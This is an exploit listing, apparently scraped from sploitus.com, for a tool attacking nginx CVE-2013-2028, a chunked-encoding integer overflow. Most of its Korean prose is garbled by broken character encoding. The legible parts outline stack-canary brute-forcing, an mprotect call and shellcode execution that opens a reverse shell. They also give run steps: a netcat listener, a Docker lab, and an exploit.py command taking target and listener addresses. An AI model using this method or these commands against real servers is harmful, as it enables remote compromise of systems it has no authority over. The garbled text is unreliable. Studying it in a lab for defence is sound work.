## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-M4DRAT-CVE-2013-2028-EXPLOIT
# CVE-2013-2028 μ΅μ€νλ‘μ
## μ·¨μ½μ μΈλΆ μ¬ν
μ·¨μ½ν μννΈμ¨μ΄: Nginx 1.3.9 < 1.4.0
μμ 컀λ°: https://github.com/nginx/nginx/commit/4997de8005630664ab35f27140e2077e818b21a7
μ·¨μ½μ μ ngx_http_parse_chunked ν¨μμ μ‘΄μ¬ν©λλ€. μ΄ μ΅μ€νλ‘μμ ngx_http_parse_chunkedμμ μ μ μ€λ²νλ‘μ°λ₯Ό λ°μμν€κ³ , μ΄ν μ΄λ₯Ό μ¬μ©νμ¬ μ€νμ μ€λ²νλ‘μ°μμΌ μ μ΄ νλ¦μ νμ·¨ν©λλ€.
## μ΅μ€νλ‘μ μμΈ
μ€μ μ΅μ€νλ‘μμ 4λ¨κ³λ‘ ꡬμ±λ©λλ€:
1. λ°μ΄νΈ λ¨μ λ¬΄μ°¨λ³ λμ
μ ν΅ν΄ μ€ν μΉ΄λ리 κ° μ°ΎκΈ°
2. rcx κ°(lpthread λ΄ μ΄λκ°λ₯Ό κ°λ¦¬ν΄)μ μ¬μ©νμ¬ mprotect μ£Όμ κ³μ°. μ μ ν μΈμλ‘ mprotect νΈμΆ.
3. μ
Έμ½λλ₯Ό RWX λ©λͺ¨λ¦¬ μμΉμ 볡μ¬.
4. μ
Έμ½λλ‘ μ ννμ¬ λ¦¬λ²μ€ μ
Έ μμ.
## μ¬ν λ°©λ²
1. νΈμ€νΈ μμ€ν
μμ 리μ€λ μμ, μ: netcat μ¬μ©: `nc -lvp 4345`
2. κ°μ λ¨Έμ μμ λ컀 μμ: `sudo docker-compose up --build`
3. μ΅μ€νλ‘μ μ€ν: `python2 exploit.py -ra 127.0.0.1 -rp 8081 -la <리μ€λ λ¨Έμ μ£Όμ> -lp <리μ€λ λ¨Έμ ν¬νΈ>`
4. μ΅μ€νλ‘μμ΄ μ€μ μΉ΄λ리 κ°μ μ°Ύκ³ λ¦¬λ²μ€ μ
Έμ μμνλλ‘ ν©λλ€.
